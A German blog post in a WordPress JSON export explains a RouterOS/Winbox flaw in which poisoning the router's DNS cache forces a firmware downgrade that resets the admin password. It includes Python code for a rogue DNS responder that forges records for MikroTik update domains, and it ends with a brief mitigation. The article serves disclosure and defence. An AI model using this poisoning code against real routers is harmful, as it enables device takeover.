{"id":39604,"date":"2019-10-31T22:36:42","date_gmt":"2019-10-31T19:36:42","guid":{"rendered":"https:\/\/prohoster.info\/blog\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv\/"},"modified":"2019-10-31T22:36:42","modified_gmt":"2019-10-31T19:36:42","slug":"backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv","title":{"rendered":"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/46ec2f99e789d0b82f56e1c8d2b6b7ec.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie M\u00f6glichkeit, Ger\u00e4te mit RouterOS (Mikrotik) remote downgraden zu k\u00f6nnen, stellt eine Bedrohung f\u00fcr Hunderttausende von Netzwerkger\u00e4ten dar. Die Schwachstelle ist mit der DNS-Cache-Vergiftung des Winbox-Protokolls verbunden und erm\u00f6glicht das Laden einer veralteten (mit Zur\u00fccksetzen des Passworts auf \u201eStandard\u201c) oder modifizierten Firmware auf das Ger\u00e4t.<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\n<img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/d1617d459a12e0101ed8f3a8ba4b5e24.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Details zur Schwachstelle<\/h3>\n<p>\nDas RouterOS-Terminal unterst\u00fctzt den Befehl zur Aufl\u00f6sung f\u00fcr die DNS-Suche.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/649794760de3663f33797da2c508570b.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDiese Anfrage wird von einer bin\u00e4ren Datei mit dem Namen resolver verarbeitet. Der Resolver ist eine von vielen bin\u00e4ren Dateien, die mit dem Winbox-Protokoll von RouterOS verbunden sind. Auf hoher Ebene k\u00f6nnen die \u201eNachrichten\u201c, die an den Winbox-Port gesendet werden, je nach Schemenummerierung auf verschiedene bin\u00e4re Dateien in RouterOS geroutet werden.<\/p>\n<p>Standardm\u00e4\u00dfig ist die DNS-Serverfunktion in RouterOS deaktiviert.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/1386b8690213499bc2ce2048219e26f8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSelbst wenn die Serverfunktion deaktiviert ist, beh\u00e4lt der Router jedoch seinen eigenen DNS-Cache.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/99c2f8b6c6fd650455849cec67149007.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nWenn wir eine Anfrage stellen, zum Beispiel mit winbox_dns_request f\u00fcr example.com, wird der Router das Ergebnis cachen.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/7be9563b09429e47ba396443cd065004.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDa wir den DNS-Server angeben k\u00f6nnen, \u00fcber den die Anfrage laufen soll, ist es trivial, falsche Adressen einzugeben. Zum Beispiel kann man den DNS-Server von <noindex><a rel=\"nofollow\" href=\"https:\/\/gist.github.com\/pklaus\/b5a7876d4d2cf7271873\">Philipp Klaus<\/a><\/noindex>, so konfigurieren, dass er immer mit einem A-Eintrag antwortet, der die IP-Adresse 192.168.88.250 enth\u00e4lt.<\/p>\n<pre><code class=\"cpp\">def dns_response(data):\n    request = DNSRecord.parse(data)\n    reply = DNSRecord(DNSHeader(\n        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)\n    qname = request.q.qname\n    qn = str(qname)\n    reply.add_answer(RR(qn,ttl=30,rdata=A(\"192.168.88.250\")))\n    print(\"---- Reply:n\", reply)\n    return reply.pack()<\/code><\/pre>\n<p>\nJetzt, wenn man mit Winbox nach example.com sucht, sieht man, dass der DNS-Cache des Routers vergiftet ist.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/b5da0f4e542350b3bf2b9977b4568ec1.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nNat\u00fcrlich ist die Vergiftung von example.com nicht besonders n\u00fctzlich, da der Router sie faktisch nicht verwenden wird. Dennoch muss der Router auf upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com und download.mikrotik.com zugreifen. Und dank eines weiteren Fehlers besteht die M\u00f6glichkeit, sie alle gleichzeitig zu vergiften.<\/p>\n<pre><code class=\"cpp\">def dns_response(data):\n    request = DNSRecord.parse(data)\n    reply = DNSRecord(DNSHeader(\n        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)\n    qname = request.q.qname\n    qn = str(qname)\n    reply.add_answer(RR(qn,ttl=30,rdata=A(\"192.168.88.250\")))\n    reply.add_answer(RR(\"upgrade.mikrotik.com\",ttl=604800,\n        rdata=A(\"192.168.88.250\")))\n    reply.add_answer(RR(\"cloud.mikrotik.com\",ttl=604800,\n        rdata=A(\"192.168.88.250\")))\n    reply.add_answer(RR(\"cloud2.mikrotik.com\",ttl=604800,\n        rdata=A(\"192.168.88.250\")))\n    reply.add_answer(RR(\"download.mikrotik.com\",ttl=604800,\n        rdata=A(\"192.168.88.250\")))\n    print(\"---- Reply:n\", reply)\n    return reply.pack()<\/code><\/pre>\n<p>\nDer Router fragt eine Genehmigung an, und wir geben f\u00fcnf zur\u00fcck. Der Router cached all diese Antworten falsch.<\/p>\n<p><img decoding=\"async\" alt=\"Die Backport-Sicherheitsanf\u00e4lligkeit in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten.\" src=\"\/wp-content\/uploads\/2019\/10\/0cc8b45337fa71f2ea3a1222e4d673c2.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEs ist offensichtlich, dass dieser Angriff auch n\u00fctzlich ist, wenn der Router als DNS-Server fungiert, da er es erm\u00f6glicht, die Benutzer des Routers anzugreifen.<\/p>\n<p>Zudem erm\u00f6glicht dieser Angriff, eine schwerwiegendere Schwachstelle auszunutzen: die Downgrade- oder Backportierung der RouterOS-Version. Der Angreifer rekreiert die Logik des Update-Servers, einschlie\u00dflich des Changelogs, und zwingt RouterOS dazu, eine veraltete (anf\u00e4llige) Version als aktuell zu betrachten. Die Gefahr hierbei liegt darin, dass beim \"Update\" der Version das Administratorpasswort auf \"Standard\" zur\u00fcckgesetzt wird \u2013 ein Angreifer kann mit einem leeren Passwort ins System einsteigen!<\/p>\n<p><center><div class=\"youtube-placeholder\" data-id=\"5SW7z0eUDuA\" onclick=\"loadVideo(this)\">\r\n        <img decoding=\"async\" src=\"https:\/\/img.youtube.com\/vi\/5SW7z0eUDuA\/hqdefault.jpg\" alt=\"Video abspielen\" loading=\"lazy\" width=\"480\" height=\"360\" style=\"width:100%;height:auto;\">\r\n        <div class=\"play-button\"><\/div>\r\n    <\/div><\/center><br \/>\nDer Angriff funktioniert gut, obwohl <noindex><a rel=\"nofollow\" href=\"https:\/\/medium.com\/@jbaines\">der Autor<\/a><\/noindex> noch mehrere Angriffsvektoren implementiert, die auch mit <noindex><a rel=\"nofollow\" href=\"https:\/\/medium.com\/tenable-techblog\/routeros-chain-to-root-f4e0b07c0b21\">dem Einbetten eines Backdoors in die Firmware<\/a><\/noindex>zu tun haben, aber das ist bereits \u00fcberfl\u00fcssige Technik und ihre Anwendung zu illegalen Zwecken ist strafbar.<\/p>\n<h3>Schutz<\/h3>\n<p>\nEin einfaches Deaktivieren von Winbox kann vor diesen Angriffen sch\u00fctzen. Trotz der Bequemlichkeit der Verwaltung \u00fcber Winbox ist es besser, das SSH-Protokoll zu nutzen.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/473676\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u0430\u0443\u043d\u0433\u0440\u0435\u0439\u0434\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430 \u0431\u0430\u0437\u0435 RouterOS (Mikrotik) \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0441\u043e\u0442\u043d\u0438 \u0442\u044b\u0441\u044f\u0447 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0442\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c DNS-\u043a\u0435\u0448\u0430 Winbox \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0443\u044e (\u0441\u043e \u0441\u0431\u0440\u043e\u0441\u043e\u043c \u043f\u0430\u0440\u043e\u043b\u044f \u00ab\u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e\u00bb) \u0438\u043b\u0438 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e. \u0414\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0422\u0435\u0440\u043c\u0438\u043d\u0430\u043b RouterOS \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 DNS. \u042d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u043c \u0444\u0430\u0439\u043b\u043e\u043c \u0441 \u0438\u043c\u0435\u043d\u0435\u043c resolver. Resolver \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":39605,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-39604","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47Backport \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 RouterOS \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0441\u043e\u0442\u043d\u0438 \u0442\u044b\u0441\u044f\u0447 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:36:42+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:36:42+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Die Backport-Schwachstelle in RouterOS gef\u00e4hrdet Hunderttausende von Ger\u00e4ten | ProHoster","description":"M\u00f6glichkeit.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47Backport \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 RouterOS \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0441\u043e\u0442\u043d\u0438 \u0442\u044b\u0441\u044f\u0447 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 | ProHoster","og:description":"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c.","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/backport-uyazvimost-v-routeros-stavit-pod-ugrozu-sotni-tysyach-ustrojstv","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:36:42+00:00","article:modified_time":"2019-10-31T19:36:42+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"39604","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 02:24:21","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-03-01 00:47:24","updated":"2026-01-24 02:24:21","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/39604","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=39604"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/39604\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media\/39605"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=39604"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=39604"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=39604"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}